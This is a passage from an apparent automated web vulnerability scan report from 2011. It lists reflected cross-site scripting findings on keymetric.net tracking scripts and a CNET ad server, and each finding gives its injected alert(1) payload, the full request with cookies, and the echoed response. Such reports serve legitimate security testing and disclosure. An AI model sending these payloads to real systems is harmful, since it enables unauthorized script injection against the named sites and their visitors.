The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6159d'%3balert(1)//63a1129762e was submitted in the lc4 parameter. This input was echoed as 6159d';alert(1)//63a1129762e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=6159d'%3balert(1)//63a1129762e&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:24 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '6159d';alert(1)//63a1129762e'; break;
case 'kmc4':
val = '6159d';alert(1)//63a1129762e'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...

6.18. http://km6633.keymetric.net/KM2.js [lc5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99089'%3balert(1)//ff1e709af40 was submitted in the lc5 parameter. This input was echoed as 99089';alert(1)//ff1e709af40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=99089'%3balert(1)//ff1e709af40&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:37 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '99089';alert(1)//ff1e709af40'; break;
case 'kmc5':
val = '99089';alert(1)//ff1e709af40'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val
...[SNIP]...

6.19. http://km6633.keymetric.net/KM2.js [lca parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b90d7'%3balert(1)//85b9dc2c311 was submitted in the lca parameter. This input was echoed as b90d7';alert(1)//85b9dc2c311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=b90d7'%3balert(1)//85b9dc2c311&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:22 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5117

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = 'b90d7';alert(1)//85b9dc2c311'; break;
case 'kmca':
val = 'b90d7';alert(1)//85b9dc2c311'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...

6.20. http://km6633.keymetric.net/KM2.js [lmt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c7'%3balert(1)//ee247270ff0 was submitted in the lmt parameter. This input was echoed as ff6c7';alert(1)//ee247270ff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=ff6c7'%3balert(1)//ee247270ff0&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:33 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5171

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
dGroup not provided'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not available'; break;
case 'kmmt':
val = 'ff6c7';alert(1)//ee247270ff0'; break;
case 'kmmt':
val = 'ff6c7';alert(1)//ee247270ff0'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...

6.21. http://km6633.keymetric.net/KM2.js [rho parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cb2f'%3balert(1)//ffe0caab215 was submitted in the rho parameter. This input was echoed as 9cb2f';alert(1)//ffe0caab215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=9cb2f'%3balert(1)//ffe0caab215&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:46 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5084

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '9cb2f';alert(1)//ffe0caab215'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '6633';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...

6.22. http://km6633.keymetric.net/KM2.js [rqu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ce7a'%3balert(1)//c5080ee8c45 was submitted in the rqu parameter. This input was echoed as 5ce7a';alert(1)//c5080ee8c45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=5ce7a'%3balert(1)//c5080ee8c45&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:58 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5126

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = '5ce7a';alert(1)//c5080ee8c45'; break;
case 'kmkw':
val = '5ce7a';alert(1)//c5080ee8c45'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...

6.23. http://km6633.keymetric.net/KM2.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b025c'%3balert(1)//d0d68f25c02 was submitted in the vid parameter. This input was echoed as b025c';alert(1)//d0d68f25c02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=b025c'%3balert(1)//d0d68f25c02&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:43 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5088

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS6633=b025c';alert(1)//d0d68f25c02;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...

6.24. http://km6633.keymetric.net/KMGCnew.js [disp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the disp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a93d4'%3balert(1)//0f01dddc3b0 was submitted in the disp parameter. This input was echoed as a93d4';alert(1)//0f01dddc3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-4999&disp=%23%23%23-%23%23%23-%23%23%23%23a93d4'%3balert(1)//0f01dddc3b0&ctype=1&rnd=0.6861688662320375&vid=0bc70b60e622406ea5f4f1d9ed0e0f57 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:31 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-4999','877-474-2252a93d4';alert(1)//0f01dddc3b0');

6.25. http://km6633.keymetric.net/KMGCnew.js [pat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the pat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20803'-alert(1)-'83f319c8a55 was submitted in the pat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-499920803'-alert(1)-'83f319c8a55&disp=%23%23%23-%23%23%23-%23%23%23%23&ctype=1&rnd=0.6861688662320375&vid=0bc70b60e622406ea5f4f1d9ed0e0f57 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:19 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-499920803'-alert(1)-'83f319c8a55','877-474-2252');

6.26. http://mads.cnet.com/mac-ad [ADREQ&beacon parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 887e4<a>871697164f9 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1887e4<a>871697164f9&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:44 GMT
Server: Apache/2.2
Content-Length: 582
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:39:44 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1887e4<a>871697164f9&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='188748716971649' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::139
...[SNIP]...

6.27. http://mads.cnet.com/mac-ad [ATTR parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the ATTR request parameter is copied into the HTML document as plain text between tags. The payload 6f671<a>5ad23d70e87 was submitted in the ATTR parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%206f671<a>5ad23d70e87&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:21 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:34:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%206f671<a>5ad23d70e87&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0"
...[SNIP]...

6.28. http://mads.cnet.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload a03b0<a>e40f8083930 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5a03b0<a>e40f8083930&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:53 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:35:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5a03b0<a>e40f8083930&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD
...[SNIP]...

6.29. http://mads.cnet.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc705"><script>alert(1)</script>4aa2c504d19 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

